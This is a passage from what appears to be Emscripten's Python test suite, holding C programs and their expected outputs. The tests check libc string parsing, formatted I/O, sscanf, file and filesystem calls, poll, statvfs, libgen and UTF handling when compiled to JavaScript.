printf("%g\n", strtod("-0.0", &endptr));
printf("%g\n", strtod("1", &endptr));
printf("%g\n", strtod("1.", &endptr));
printf("%g\n", strtod("1.0", &endptr));
printf("%g\n", strtod("z1.0", &endptr));
printf("%g\n", strtod("0.5", &endptr));
printf("%g\n", strtod(".5", &endptr));
printf("%g\n", strtod(".a5", &endptr));
printf("%g\n", strtod("123", &endptr));
printf("%g\n", strtod("123.456", &endptr));
printf("%g\n", strtod("-123.456", &endptr));
printf("%g\n", strtod("1234567891234567890", &endptr));
printf("%g\n", strtod("1234567891234567890e+50", &endptr));
printf("%g\n", strtod("84e+220", &endptr));
printf("%g\n", strtod("123e-50", &endptr));
printf("%g\n", strtod("123e-250", &endptr));
printf("%g\n", strtod("123e-450", &endptr));
char str[] = " 12.34e56end";
printf("%g\n", strtod(str, &endptr));
printf("%d\n", endptr - str);
printf("%g\n", strtod("84e+420", &endptr));
printf("%.12f\n", strtod("1.2345678900000000e+08", NULL));
return 0;
}
'''
expected = '''
0
0
0
-0
1
1
1
0
0.5
0.5
0
123
123.456
-123.456
1.23457e+18
1.23457e+68
8.4e+221
1.23e-48
1.23e-248
0
1.234e+57
10
inf
123456789.000000000000
'''
self.do_run(src, re.sub(r'\n\s+', '\n', expected))
self.do_run(src.replace('strtod', 'strtold'), re.sub(r'\n\s+', '\n', expected)) # XXX add real support for long double
def test_strtok(self):
src = r'''
#include<stdio.h>
#include<string.h>
int main() {
char test[80], blah[80];
char *sep = "\\/:;=-";
char *word, *phrase, *brkt, *brkb;
strcpy(test, "This;is.a:test:of=the/string\\tokenizer-function.");
for (word = strtok_r(test, sep, &brkt); word; word = strtok_r(NULL, sep, &brkt)) {
strcpy(blah, "blah:blat:blab:blag");
for (phrase = strtok_r(blah, sep, &brkb); phrase; phrase = strtok_r(NULL, sep, &brkb)) {
printf("at %s:%s\n", word, phrase);
}
}
return 0;
}
'''
expected = '''at This:blah
at This:blat
at This:blab
at This:blag
at is.a:blah
at is.a:blat
at is.a:blab
at is.a:blag
at test:blah
at test:blat
at test:blab
at test:blag
at of:blah
at of:blat
at of:blab
at of:blag
at the:blah
at the:blat
at the:blab
at the:blag
at string:blah
at string:blat
at string:blab
at string:blag
at tokenizer:blah
at tokenizer:blat
at tokenizer:blab
at tokenizer:blag
at function.:blah
at function.:blat
at function.:blab
at function.:blag
'''
self.do_run(src, expected)
def test_parseInt(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
if Settings.QUANTUM_SIZE == 1: return self.skip('Q1 and I64_1 do not mix well yet')
src = open(path_from_root('tests', 'parseInt', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'parseInt', 'output.txt'), 'r').read()
self.do_run(src, expected)
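# strupr/strlwr are non-standard case-conversion helpers.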
def test_transtrcase(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char szToupr[] = "hello, ";
char szTolwr[] = "EMSCRIPTEN";
strupr(szToupr);
strlwr(szTolwr);
printf(szToupr);
printf(szTolwr);
return 0;
}
'''
self.do_run(src, 'HELLO, emscripten')
def test_printf(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
self.banned_js_engines = [NODE_JS, V8_ENGINE] # SpiderMonkey and V8 do different things to float64 typed arrays, un-NaNing, etc.
src = open(path_from_root('tests', 'printf', 'test.c'), 'r').read()
expected = [open(path_from_root('tests', 'printf', 'output.txt'), 'r').read(),
open(path_from_root('tests', 'printf', 'output_i64_1.txt'), 'r').read()]
self.do_run(src, expected)
def test_printf_2(self):
src = r'''
#include <stdio.h>
int main() {
char c = '1';
short s = 2;
int i = 3;
long long l = 4;
float f = 5.5;
double d = 6.6;
printf("%c,%hd,%d,%lld,%.1f,%.1llf\n", c, s, i, l, f, d);
printf("%#x,%#x\n", 1, 0);
return 0;
}
'''
self.do_run(src, '1,2,3,4,5.5,6.6\n0x1,0\n')
def test_vprintf(self):
src = r'''
#include <stdio.h>
#include <stdarg.h>
void print(char* format, ...) {
va_list args;
va_start (args, format);
vprintf (format, args);
va_end (args);
}
int main () {
print("Call with %d variable argument.\n", 1);
print("Call with %d variable %s.\n", 2, "arguments");
return 0;
}
'''
expected = '''
Call with 1 variable argument.
Call with 2 variable arguments.
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_vsnprintf(self):
if self.emcc_args is None: return self.skip('needs i64 math')
src = r'''
#include <stdio.h>
#include <stdarg.h>
#include <stdint.h>
void printy(const char *f, ...)
{
char buffer[256];
va_list args;
va_start(args, f);
vsnprintf(buffer, 256, f, args);
puts(buffer);
va_end(args);
}
int main(int argc, char **argv) {
int64_t x = argc - 1;
int64_t y = argc - 1 + 0x400000;
if (x % 3 == 2) y *= 2;
printy("0x%llx_0x%llx", x, y);
printy("0x%llx_0x%llx", x, x);
printy("0x%llx_0x%llx", y, x);
printy("0x%llx_0x%llx", y, y);
{
uint64_t A = 0x800000;
uint64_t B = 0x800000000000ULL;
printy("0x%llx_0x%llx", A, B);
}
{
uint64_t A = 0x800;
uint64_t B = 0x12340000000000ULL;
printy("0x%llx_0x%llx", A, B);
}
{
uint64_t A = 0x000009182746756;
uint64_t B = 0x192837465631ACBDULL;
printy("0x%llx_0x%llx", A, B);
}
return 0;
}
'''
self.do_run(src, '''0x0_0x400000
0x0_0x0
0x400000_0x0
0x400000_0x400000
0x800000_0x800000000000
0x800_0x12340000000000
0x9182746756_0x192837465631acbd
''')
def test_printf_more(self):
src = r'''
#include <stdio.h>
int main() {
int size = snprintf(NULL, 0, "%s %d %.2f\n", "me and myself", 25, 1.345);
char buf[size];
snprintf(buf, size, "%s %d %.2f\n", "me and myself", 25, 1.345);
printf("%d : %s\n", size, buf);
char *buff = NULL;
asprintf(&buff, "%d waka %d\n", 21, 95);
puts(buff);
return 0;
}
'''
self.do_run(src, '22 : me and myself 25 1.34\n21 waka 95\n')
def test_perrar(self):
src = r'''
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
int main( int argc, char** argv ){
int retval = open( "NonExistingFile", O_RDONLY );
if( retval == -1 )
perror( "Cannot open NonExistingFile" );
return 0;
}
'''
self.do_run(src, 'Cannot open NonExistingFile: No such file or directory\n')
def test_atoX(self):
if self.emcc_args is None: return self.skip('requires ta2')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main () {
printf("%d*", atoi(""));
printf("%d*", atoi("a"));
printf("%d*", atoi(" b"));
printf("%d*", atoi(" c "));
printf("%d*", atoi("6"));
printf("%d*", atoi(" 5"));
printf("%d*", atoi("4 "));
printf("%d*", atoi("3 6"));
printf("%d*", atoi(" 3 7"));
printf("%d*", atoi("9 d"));
printf("%d\n", atoi(" 8 e"));
printf("%d*", atol(""));
printf("%d*", atol("a"));
printf("%d*", atol(" b"));
printf("%d*", atol(" c "));
printf("%d*", atol("6"));
printf("%d*", atol(" 5"));
printf("%d*", atol("4 "));
printf("%d*", atol("3 6"));
printf("%d*", atol(" 3 7"));
printf("%d*", atol("9 d"));
printf("%d\n", atol(" 8 e"));
printf("%lld*", atoll("6294967296"));
printf("%lld*", atoll(""));
printf("%lld*", atoll("a"));
printf("%lld*", atoll(" b"));
printf("%lld*", atoll(" c "));
printf("%lld*", atoll("6"));
printf("%lld*", atoll(" 5"));
printf("%lld*", atoll("4 "));
printf("%lld*", atoll("3 6"));
printf("%lld*", atoll(" 3 7"));
printf("%lld*", atoll("9 d"));
printf("%lld\n", atoll(" 8 e"));
return 0;
}
'''
self.do_run(src, '0*0*0*0*6*5*4*3*3*9*8\n0*0*0*0*6*5*4*3*3*9*8\n6294967296*0*0*0*0*6*5*4*3*3*9*8\n')
def test_strstr(self):
src = r'''
#include <stdio.h>
#include <string.h>
int main()
{
printf("%d\n", !!strstr("\\n", "\\n"));
printf("%d\n", !!strstr("cheezy", "ez"));
printf("%d\n", !!strstr("cheeezy", "ez"));
printf("%d\n", !!strstr("cheeeeeeeeeezy", "ez"));
printf("%d\n", !!strstr("cheeeeeeeeee1zy", "ez"));
printf("%d\n", !!strstr("che1ezy", "ez"));
printf("%d\n", !!strstr("che1ezy", "che"));
printf("%d\n", !!strstr("ce1ezy", "che"));
printf("%d\n", !!strstr("ce1ezy", "ezy"));
printf("%d\n", !!strstr("ce1ezyt", "ezy"));
printf("%d\n", !!strstr("ce1ez1y", "ezy"));
printf("%d\n", !!strstr("cheezy", "a"));
printf("%d\n", !!strstr("cheezy", "b"));
printf("%d\n", !!strstr("cheezy", "c"));
printf("%d\n", !!strstr("cheezy", "d"));
printf("%d\n", !!strstr("cheezy", "g"));
printf("%d\n", !!strstr("cheezy", "h"));
printf("%d\n", !!strstr("cheezy", "i"));
printf("%d\n", !!strstr("cheezy", "e"));
printf("%d\n", !!strstr("cheezy", "x"));
printf("%d\n", !!strstr("cheezy", "y"));
printf("%d\n", !!strstr("cheezy", "z"));
printf("%d\n", !!strstr("cheezy", "_"));
const char *str = "a big string";
printf("%d\n", strstr(str, "big") - str);
return 0;
}
'''
self.do_run(src, '''1
1
1
1
0
1
1
0
1
1
0
0
0
1
0
0
1
0
1
0
1
1
0
2
''')
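# sscanf coverage: %s/%d basics, the float conversion letters, embedded
# whitespace, and the number of matched items returned.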
def test_sscanf(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = r'''
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main () {
#define CHECK(str) \
{ \
char name[1000]; \
memset(name, 0, 1000); \
int prio = 99; \
sscanf(str, "%s %d", name, &prio); \
printf("%s : %d\n", name, prio); \
}
CHECK("en-us 2");
CHECK("en-r");
CHECK("en 3");
printf("%f, %f\n", atof("1.234567"), atof("cheez"));
char float_formats[] = "fegE";
char format[] = "%_";
for(int i = 0; i < 4; ++i) {
format[1] = float_formats[i];
float n = -1;
sscanf(" 2.8208", format, &n);
printf("%.4f\n", n);
float a = -1;
sscanf("-3.03", format, &a);
printf("%.4f\n", a);
}
char buffy[100];
sscanf("cheez some thing moar 123\nyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
sscanf("cheez something\nmoar 123\nyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
sscanf("cheez somethingmoar\tyet more\n", "cheez %s", buffy);
printf("|%s|\n", buffy);
int numverts = -1;
printf("%d\n", sscanf(" numverts 1499\n", " numverts %d", &numverts)); // white space is the same, even if tab vs space
printf("%d\n", numverts);
int index;
float u, v;
short start, count;
printf("%d\n", sscanf(" vert 87 ( 0.481565 0.059481 ) 0 1\n", " vert %d ( %f %f ) %hu %hu", &index, &u, &v, &start, &count));
printf("%d,%.6f,%.6f,%hu,%hu\n", index, u, v, start, count);
int neg, neg2, neg3 = 0;
printf("%d\n", sscanf("-123 -765 -34-6", "%d %u %d", &neg, &neg2, &neg3));
printf("%d,%u,%d\n", neg, neg2, neg3);
{
int a = 0;
sscanf("1", "%i", &a);
printf("%i\n", a);
}
return 0;
}
'''
self.do_run(src, 'en-us : 2\nen-r : 99\nen : 3\n1.234567, 0.000000\n2.8208\n-3.0300\n2.8208\n-3.0300\n2.8208\n-3.0300\n2.8208\n-3.0300\n|some|\n|something|\n|somethingmoar|\n' +
'1\n1499\n' +
'5\n87,0.481565,0.059481,0,1\n' +
'3\n-123,4294966531,-34\n' +
'1\n')
def test_sscanf_2(self):
# doubles
if Settings.USE_TYPED_ARRAYS == 2:
for ftype in ['float', 'double']:
src = r'''
#include <stdio.h>
int main(){
char strval1[] = "1.2345678901";
char strval2[] = "1.23456789e5";
char strval3[] = "1.23456789E5";
char strval4[] = "1.2345678e-5";
char strval5[] = "1.2345678E-5";
double dblval = 1.2345678901;
double tstval;
sscanf(strval1, "%lf", &tstval);
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval2, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval3, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval4, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval5, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
return 0;
}
'''
if ftype == 'float':
self.do_run(src.replace('%lf', '%f').replace('double', 'float'), '''Pass: 1.234568 1.234568
Pass: 123456.789063 123456.789063
Pass: 123456.789063 123456.789063
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
else:
self.do_run(src, '''Pass: 1.234568 1.234568
Pass: 123456.789000 123456.789000
Pass: 123456.789000 123456.789000
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
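# %n stores the number of characters consumed so far without counting
# toward the return value.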
def test_sscanf_n(self):
src = r'''
#include<stdio.h>
int main() {
char *line = "version 1.0";
int i, l, lineno;
char word[80];
if (sscanf(line, "%s%n", word, &l) != 1) {
printf("Header format error, line %d\n", lineno);
}
printf("[DEBUG] word 1: %s, l: %d\n", word, l);
int x = sscanf("one %n two", "%s %n", word, &l);
printf("%d,%s,%d\n", x, word, l);
{
int a, b, c, count;
count = sscanf("12345 6789", "%d %n%d", &a, &b, &c);
printf("%i %i %i %i\n", count, a, b, c);
}
return 0;
}
'''
self.do_run(src, '''[DEBUG] word 1: version, l: 7\n1,one,4\n2 12345 6 6789\n''')
def test_sscanf_whitespace(self):
src = r'''
#include<stdio.h>
int main() {
short int x;
short int y;
const char* buffer[] = {
"173,16",
" 16,173",
"183, 173",
" 17, 287",
" 98, 123, "
};
for (int i=0; i<5; ++i) {
sscanf(buffer[i], "%hd,%hd", &x, &y);
printf("%d:%d,%d ", i, x, y);
}
return 0;
}
'''
self.do_run(src, '''0:173,16 1:16,173 2:183,173 3:17,287 4:98,123''')
def test_sscanf_other_whitespace(self):
Settings.SAFE_HEAP = 0 # use i16s in printf
src = r'''
#include<stdio.h>
int main() {
short int x;
short int y;
const char* buffer[] = {
"\t2\t3\t", /* TAB - horizontal tab */
"\t\t5\t\t7\t\t",
"\n11\n13\n", /* LF - line feed */
"\n\n17\n\n19\n\n",
"\v23\v29\v", /* VT - vertical tab */
"\v\v31\v\v37\v\v",
"\f41\f43\f", /* FF - form feed */
"\f\f47\f\f53\f\f",
"\r59\r61\r", /* CR - carrage return */
"\r\r67\r\r71\r\r"
};
for (int i=0; i<10; ++i) {
x = 0; y = 0;
sscanf(buffer[i], " %d %d ", &x, &y);
printf("%d, %d, ", x, y);
}
return 0;
}
'''
self.do_run(src, '''2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, ''')
def test_sscanf_3(self):
# i64
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('64-bit sscanf only supported in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(){
int64_t s, m, l;
printf("%d\n", sscanf("123 1073741823 1125899906842620", "%lld %lld %lld", &s, &m, &l));
printf("%lld,%lld,%lld\n", s, m, l);
int64_t negS, negM, negL;
printf("%d\n", sscanf("-123 -1073741823 -1125899906842620", "%lld %lld %lld", &negS, &negM, &negL));
printf("%lld,%lld,%lld\n", negS, negM, negL);
return 0;
}
'''
self.do_run(src, '3\n123,1073741823,1125899906842620\n' +
'3\n-123,-1073741823,-1125899906842620\n')
def test_sscanf_4(self):
src = r'''
#include <stdio.h>
int main()
{
char pYear[16], pMonth[16], pDay[16], pDate[64];
printf("%d\n", sscanf("Nov 19 2012", "%s%s%s", pMonth, pDay, pYear));
printf("day %s, month %s, year %s \n", pDay, pMonth, pYear);
return(0);
}
'''
self.do_run(src, '3\nday 19, month Nov, year 2012')
def test_sscanf_5(self):
src = r'''
#include "stdio.h"
static const char *colors[] = {
" c black",
". c #001100",
"X c #111100"
};
int main(){
unsigned char code;
char color[32];
int rcode;
for(int i = 0; i < 3; i++) {
rcode = sscanf(colors[i], "%c c %s", &code, color);
printf("%i, %c, %s\n", rcode, code, color);
}
}
'''
self.do_run(src, '2, , black\n2, ., #001100\n2, X, #111100')
def test_sscanf_skip(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip("need ta2 for full i64")
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(){
int val1;
printf("%d\n", sscanf("10 20 30 40", "%*lld %*d %d", &val1));
printf("%d\n", val1);
int64_t large, val2;
printf("%d\n", sscanf("1000000 -1125899906842620 -123 -1073741823", "%lld %*lld %ld %*d", &large, &val2));
printf("%lld,%d\n", large, val2);
return 0;
}
'''
self.do_run(src, '1\n30\n2\n1000000,-123\n')
def test_sscanf_caps(self):
src = r'''
#include "stdio.h"
int main(){
unsigned int a;
float e, f, g;
sscanf("a 1.1 1.1 1.1", "%X %E %F %G", &a, &e, &f, &g);
printf("%d %.1F %.1F %.1F\n", a, e, f, g);
}
'''
self.do_run(src, '10 1.1 1.1 1.1')
def test_langinfo(self):
src = open(path_from_root('tests', 'langinfo', 'test.c'), 'r').read()
expected = open(path_from_root('tests', 'langinfo', 'output.txt'), 'r').read()
self.do_run(src, expected, extra_emscripten_args=['-H', 'libc/langinfo.h'])
def test_files(self):
if self.emcc_args is not None and '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here, to test we don't break FS stuff
Settings.CORRECT_SIGNS = 1 # Just so our output is what we expect. Can flip them both.
post = '''
def process(filename):
src = \'\'\'
var Module = {
'noFSInit': true,
'preRun': function() {
FS.createLazyFile('/', 'test.file', 'test.file', true, false);
// Test FS_* exporting
Module['FS_createDataFile']('/', 'somefile.binary', [100, 200, 50, 25, 10, 77, 123], true, false); // 200 becomes -56, since signed chars are used in memory
var test_files_input = 'hi there!';
var test_files_input_index = 0;
FS.init(function() {
return test_files_input.charCodeAt(test_files_input_index++) || null;
});
}
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
other = open(os.path.join(self.get_dir(), 'test.file'), 'w')
other.write('some data')
other.close()
src = open(path_from_root('tests', 'files.cpp'), 'r').read()
self.do_run(src, 'size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\ntexte\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\nok.\n',
post_build=post, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_files_m(self):
# Test for Module.stdin etc.
Settings.CORRECT_SIGNS = 1
post = '''
def process(filename):
src = \'\'\'
var data = [10, 20, 40, 30];
var Module = {
stdin: function() { return data.pop() || null },
stdout: function(x) { Module.print('got: ' + x) }
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
src = r'''
#include <stdio.h>
#include <unistd.h>
int main () {
char c;
fprintf(stderr, "isatty? %d,%d,%d\n", isatty(fileno(stdin)), isatty(fileno(stdout)), isatty(fileno(stderr)));
while ((c = fgetc(stdin)) != EOF) {
putc(c+5, stdout);
}
return 0;
}
'''
self.do_run(src, 'isatty? 0,0,1\ngot: 35\ngot: 45\ngot: 25\ngot: 15\n', post_build=post)
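# fwrite to a stream opened read-only ("rb") must write nothing and return 0.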
def test_fwrite_0(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main ()
{
FILE *fh;
fh = fopen("a.txt", "wb");
if (!fh) exit(1);
fclose(fh);
fh = fopen("a.txt", "rb");
if (!fh) exit(1);
char data[] = "foobar";
size_t written = fwrite(data, 1, sizeof(data), fh);
printf("written=%zu\n", written);
}
'''
self.do_run(src, 'written=0')
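# fgetc must return the byte value (234), not a sign-extended negative char.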
def test_fgetc_unsigned(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
int main() {
FILE *file = fopen("file_with_byte_234.txt", "rb");
int c = fgetc(file);
printf("*%d\n", c);
}
'''
open('file_with_byte_234.txt', 'wb').write('\xea')
self.emcc_args += ['--embed-file', 'file_with_byte_234.txt']
self.do_run(src, '*234\n')
def test_fgets_eol(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
char buf[32];
int main()
{
char *r = "SUCCESS";
FILE *f = fopen("eol.txt", "r");
while (fgets(buf, 32, f) != NULL) {
if (buf[0] == '\0') {
r = "FAIL";
break;
}
}
printf("%s\n", r);
fclose(f);
return 0;
}
'''
open('eol.txt', 'wb').write('\n')
self.emcc_args += ['--embed-file', 'eol.txt']
self.do_run(src, 'SUCCESS\n')
def test_fscanf(self):
if self.emcc_args is None: return self.skip('requires emcc')
open(os.path.join(self.get_dir(), 'three_numbers.txt'), 'w').write('''-1 0.1 -.1''')
src = r'''
#include <stdio.h>
#include <assert.h>
#include <float.h>
int main()
{
float x = FLT_MAX, y = FLT_MAX, z = FLT_MAX;
FILE* fp = fopen("three_numbers.txt", "r");
if (fp) {
int match = fscanf(fp, " %f %f %f ", &x, &y, &z);
printf("match = %d\n", match);
printf("x = %0.1f, y = %0.1f, z = %0.1f\n", x, y, z);
} else {
printf("failed to open three_numbers.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'three_numbers.txt']
self.do_run(src, 'match = 3\nx = -1.0, y = 0.1, z = -0.1\n')
def test_readdir(self):
src = open(path_from_root('tests', 'dirent', 'test_readdir.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_stat(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
\'\'\'
var f1 = FS.createFolder('/', 'test', true, true);
var f2 = FS.createDataFile(f1, 'file', 'abcdef', true, true);
var f3 = FS.createLink(f1, 'link', 'file', true, true);
var f4 = FS.createDevice(f1, 'device', function(){}, function(){});
f1.timestamp = f2.timestamp = f3.timestamp = f4.timestamp = new Date(1200000000000);
\'\'\'
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'stat', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'stat', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'test', 'abcdef', true, true);"
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'fcntl', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl_open(self):
src = open(path_from_root('tests', 'fcntl-open', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl-open', 'output.txt'), 'r').read()
self.do_run(src, expected, force_c=True, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_fcntl_misc(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'test', 'abcdef', true, true);"
)
open(filename, 'w').write(src)
'''
src = open(path_from_root('tests', 'fcntl-misc', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'fcntl-misc', 'output.txt'), 'r').read()
self.do_run(src, expected, post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h'])
def test_poll(self):
add_pre_run = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
\'\'\'
FS.createDataFile('/', 'file', 'abcdef', true, true);
FS.createDevice('/', 'device', function() {}, function() {});
\'\'\'
)
open(filename, 'w').write(src)
'''
src = r'''
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
int main() {
struct pollfd multi[5];
multi[0].fd = open("/file", O_RDONLY, 0777);
multi[1].fd = open("/device", O_RDONLY, 0777);
multi[2].fd = 123;
multi[3].fd = open("/file", O_RDONLY, 0777);
multi[4].fd = open("/file", O_RDONLY, 0777);
multi[0].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[1].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[2].events = POLLIN | POLLOUT | POLLNVAL | POLLERR;
multi[3].events = 0x00;
multi[4].events = POLLOUT | POLLNVAL | POLLERR;
printf("ret: %d\n", poll(multi, 5, 123));
printf("errno: %d\n", errno);
printf("multi[0].revents: %d\n", multi[0].revents == (POLLIN | POLLOUT));
printf("multi[1].revents: %d\n", multi[1].revents == (POLLIN | POLLOUT));
printf("multi[2].revents: %d\n", multi[2].revents == POLLNVAL);
printf("multi[3].revents: %d\n", multi[3].revents == 0);
printf("multi[4].revents: %d\n", multi[4].revents == POLLOUT);
return 0;
}
'''
expected = r'''
ret: 4
errno: 0
multi[0].revents: 1
multi[1].revents: 1
multi[2].revents: 1
multi[3].revents: 1
multi[4].revents: 1
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected), post_build=add_pre_run, extra_emscripten_args=['-H', 'libc/fcntl.h,poll.h'])
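# statvfs on the JS filesystem reports fixed synthetic values; the expected
# output below pins them.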
def test_statvfs(self):
src = r'''
#include <stdio.h>
#include <errno.h>
#include <sys/statvfs.h>
int main() {
struct statvfs s;
printf("result: %d\n", statvfs("/test", &s));
printf("errno: %d\n", errno);
printf("f_bsize: %lu\n", s.f_bsize);
printf("f_frsize: %lu\n", s.f_frsize);
printf("f_blocks: %lu\n", s.f_blocks);
printf("f_bfree: %lu\n", s.f_bfree);
printf("f_bavail: %lu\n", s.f_bavail);
printf("f_files: %d\n", s.f_files > 5);
printf("f_ffree: %lu\n", s.f_ffree);
printf("f_favail: %lu\n", s.f_favail);
printf("f_fsid: %lu\n", s.f_fsid);
printf("f_flag: %lu\n", s.f_flag);
printf("f_namemax: %lu\n", s.f_namemax);
return 0;
}
'''
expected = r'''
result: 0
errno: 0
f_bsize: 4096
f_frsize: 4096
f_blocks: 1000000
f_bfree: 500000
f_bavail: 500000
f_files: 1
f_ffree: 1000000
f_favail: 1000000
f_fsid: 42
f_flag: 2
f_namemax: 255
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_libgen(self):
src = r'''
#include <stdio.h>
#include <libgen.h>
int main() {
char p1[16] = "/usr/lib", p1x[16] = "/usr/lib";
printf("%s -> ", p1);
printf("%s : %s\n", dirname(p1x), basename(p1));
char p2[16] = "/usr", p2x[16] = "/usr";
printf("%s -> ", p2);
printf("%s : %s\n", dirname(p2x), basename(p2));
char p3[16] = "/usr/", p3x[16] = "/usr/";
printf("%s -> ", p3);
printf("%s : %s\n", dirname(p3x), basename(p3));
char p4[16] = "/usr/lib///", p4x[16] = "/usr/lib///";
printf("%s -> ", p4);
printf("%s : %s\n", dirname(p4x), basename(p4));
char p5[16] = "/", p5x[16] = "/";
printf("%s -> ", p5);
printf("%s : %s\n", dirname(p5x), basename(p5));
char p6[16] = "///", p6x[16] = "///";
printf("%s -> ", p6);
printf("%s : %s\n", dirname(p6x), basename(p6));
char p7[16] = "/usr/../lib/..", p7x[16] = "/usr/../lib/..";
printf("%s -> ", p7);
printf("%s : %s\n", dirname(p7x), basename(p7));
char p8[16] = "", p8x[16] = "";
printf("(empty) -> %s : %s\n", dirname(p8x), basename(p8));
printf("(null) -> %s : %s\n", dirname(0), basename(0));
return 0;
}
'''
expected = '''
/usr/lib -> /usr : lib
/usr -> / : usr
/usr/ -> / : usr
/usr/lib/// -> /usr : lib
/ -> / : /
/// -> / : /
/usr/../lib/.. -> /usr/../lib : ..
(empty) -> . : .
(null) -> . : .
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_utime(self):
src = open(path_from_root('tests', 'utime', 'test_utime.c'), 'r').read()
self.do_run(src, 'success', force_c=True)
def test_utf(self):
self.banned_js_engines = [SPIDERMONKEY_ENGINE] # only node handles utf well
Settings.EXPORTED_FUNCTIONS = ['_main', '_malloc']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
char *c = "μ†ℱ ╋ℯ╳╋";
printf("%d %d %d %d %s\n", c[0]&0xff, c[1]&0xff, c[2]&0xff, c[3]&0xff, c);
emscripten_run_script("cheez = _malloc(100);"
"Module.writeStringToMemory(\"μ†ℱ ╋ℯ╳╋\", cheez);"
"Module.print([Pointer_stringify(cheez), Module.getValue(cheez, 'i8')&0xff, Module.getValue(cheez+1, 'i8')&0xff, Module.getValue(cheez+2, 'i8')&0xff, Module.getValue(cheez+3, 'i8')&0xff, ]);");
}
'''
self.do_run(src, '206 188 226 128 μ†ℱ ╋ℯ╳╋\nμ†ℱ ╋ℯ╳╋,206,188,226,128\n')
def test_direct_string_constant_usage(self):
if self.emcc_args is None: return self.skip('requires libcxx')
src = '''
#include <iostream>
template<int i>
void printText( const char (&text)[ i ] )
{
std::cout << text;
}
int main()
{
printText( "some string constant" );
return 0;
}
'''
self.do_run(src, "some string constant")
def test_std_cout_new(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <iostream>
struct NodeInfo { //structure that we want to transmit to our shaders
float x;
float y;
float s;
float c;
};
const int nbNodes = 100;
NodeInfo * data = new NodeInfo[nbNodes]; // our data that will be transmitted using a float texture.
template<int i>
void printText( const char (&text)[ i ] )
{
std::cout << text << std::endl;
}
int main()
{
printText( "some string constant" );
return 0;
}
'''
self.do_run(src, "some string constant")
def test_istream(self):
if self.emcc_args is None: return self.skip('requires libcxx')
src = '''
#include <string>
#include <sstream>
#include <iostream>
